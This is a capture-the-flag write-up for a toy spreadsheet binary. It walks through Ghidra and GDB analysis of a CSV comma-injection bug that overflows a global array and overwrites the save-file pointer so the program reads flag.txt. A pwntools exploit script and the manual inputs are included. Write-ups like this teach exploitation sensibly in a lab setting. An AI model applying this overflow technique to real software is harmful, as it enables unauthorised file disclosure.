Flash CTF – Spreadsheet

Challenge Description

This program purports to be an Excel-like spreadsheet application. When run, the user is given a few options which operate largely as expected.

andrew@x1yoga:~$ ./spreadsheet.bin 
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > 

Printing the spreadsheet shows an empty sheet 10×10 in size.

Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > P
	A	B	C	D	E	F	G	H	I	J	
 1	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 2	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 3	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 4	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 5	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 6	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 7	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 8	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 9	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
10	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	

Editing the spreadsheet allows us to specify a cell and new value, which subsequently appears in the spreadsheet.

Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > E
Enter cell (i.e. 'B7'): A1
Enter new value: test
Value updated!

Saving and loading the spreadsheet also appear to work as one would expect, storing and retrieving any values that had been updated.

Some light reverse engineering reveals that the “spreadsheet” is stored as as 2D array of character pointers in the global data segment. For instance we can see this in the print_spreadsheet() function, highlighted in yellow here in Ghidra’s decompiler view.

The spreadsheet array is based at offset 0x4060 from the program base address. For instance, when run in GDB the spreadsheet array appears at address 0x0000555555558060. The spreadsheet appears to always be allocated with a fixed size of 10×10, meaning it occupies 10 * 10 * sizeof(char *) = 800 bytes of space in memory.

gef➤  hexdump byte &spreadsheet
0x0000555555558060 <spreadsheet+0000>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x0000555555558070 <spreadsheet+0010>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x0000555555558080 <spreadsheet+0020>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x0000555555558090 <spreadsheet+0030>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................

Further reverse engineering shows that the “load” and “store” mechanisms work by converting the spreadsheet contents to/from CSV format and storing them in the backing file spreadsheet.csv. For instance we can see this in the save_spreadsheet() function, shown in Ghidra’s decompiler view.

The filename (spreadsheet.csv) is also stored in a global character array, at offset 0x4380. For instance, when run in GDB the savefile filename appears at address 0x555555558380.

gef➤  p savefile
$7 = 0x5555555592a0 "spreadsheet.csv"
gef➤  p &savefile
$8 = (char **) 0x555555558380 <savefile>
gef➤  hexdump byte &savefile
0x0000555555558380 <savefile+0000>    a0 92 55 55 55 55 00 00 00 00 00 00 00 00 00 00    ..UUUU..........
0x0000555555558390     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x00005555555583a0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x00005555555583b0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................

Note that this means the savefile buffer is immediately after and contiguous to the spreadsheet array. I.e. 0x4060 + 0x320 = 0x4380! This will soon be important!

Vulnerability

A CSV injection vulnerability exists when saving/loading the spreadsheet contents, due to the lack of input validation for the comma (“,”) character. The user is allowed to enter new cell values containing commas, however when these values are stored in the backing file this results in rows which exceed the expected number of columns.

andrew@x1yoga:~$ ./spreadsheet.bin 
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > E
Enter cell (i.e. 'B7'): J1
Enter new value: test,test,test
Value updated!
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > P
	A	B	C	D	E	F	G	H	I	J	
 1	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	test,test,test	
 2	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 3	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 4	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 5	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 6	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 7	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 8	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 9	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
10	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > S
Spreadsheet saved!
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > Q
Goodbye!
andrew@x1yoga:~$ cat spreadsheet.csv
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,test,test,test,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,

As we can see above, the saved CSV file contains a row with more than the expected 10 columns.

Further, the load_spreadsheet() function does not validate the number of columns before writing their values to memory. It simply reads each line of text with fgets(), then splits it on each comma-separator with strtok(), then writes each of those values to spreadsheet[row][col]even if the number of columns exceeds the fixed buffer size of 10. This is the vulnerability. We can see this in the load_spreadsheet() function, as seen in the following Ghidra decompiler output.

This allows us to cause a global buffer overflow by:

  1. Editing a cell with a string containing many comma-separated values.
  2. Saving the spreadsheet
  3. Loading the spreadsheet

Specifically, each cell value written beyond the end of the 10×10 2D array will result in the write of an 8-byte character pointer to controlled data at 8-byte offsets from the end of the array.

Exploit

Looking back through our work, we are reminded that the savefile pointer value is stored immediately contiguous to the spreadsheet array! This is especially convenient, because it means that the first char * we write beyond the end of the spreadsheet array will overwrite that pointer. This has the affect of altering the savefile value, allowing us to control the name of the file used in save/load operations.

Our exploit methodology then becomes clear:

  1. Edit cell J10 (at the end of the spreadsheet) with the string whatever,flag.txt.
  2. Save the spreadsheet, resulting in a CSV file with an erroneous 11th column in the 10th row.
  3. Load the spreadsheet, overwriting the savefile pointer with a pointer to flag.txt.
  4. Load the spreadsheet again, causing the program to read the contents of flag.txt into cell A1.
  5. Print the spreadsheet, leaking the flag!

This can be done by hand using the following inputs:

E
J10
whatever,flag.txt
S
L
L
P

Or the flag can be obtained with the following Python script:

from pwn import *

if len(sys.argv) < 2:
	print(f"Usage {sys.argv[0]} <local|remote> [host] [port]")
	exit(0)
elif sys.argv[1] == "local":
	p = process("./spreadsheet.bin")
elif sys.argv[1] == "remote":
	p = remote(sys.argv[2], sys.argv[3])

# Edit last cell, injecting 'flag.txt' in "11th" cell
p.sendline(b"E")
p.sendline(b"J10")
p.sendline(b"whatever,flag.txt")

# Save to backing file
p.sendline(b"S")

# Load the file, overwriting the backing file name in memory
p.sendline(b"L")

# Load the file again, readining from the flag.txt file!
p.sendline(b"L")

# Print out the spreadsheet and read the flag contents
p.sendline(b"P")
p.readuntil(b" 1\t")
flag = p.readuntil(b"\t")[:-1].decode()

print(f"Flag: {flag}")

p.close()
andrew@x1yoga:~$ python3 exploit.py remote localhost 5000
[+] Opening connection to localhost on port 5000: Done
Flag: MetaCTF{c0mm4_c0mm4_c0mm4_c0mma_c0mm4_ch4m3l30n}

[*] Closed connection to localhost port 5000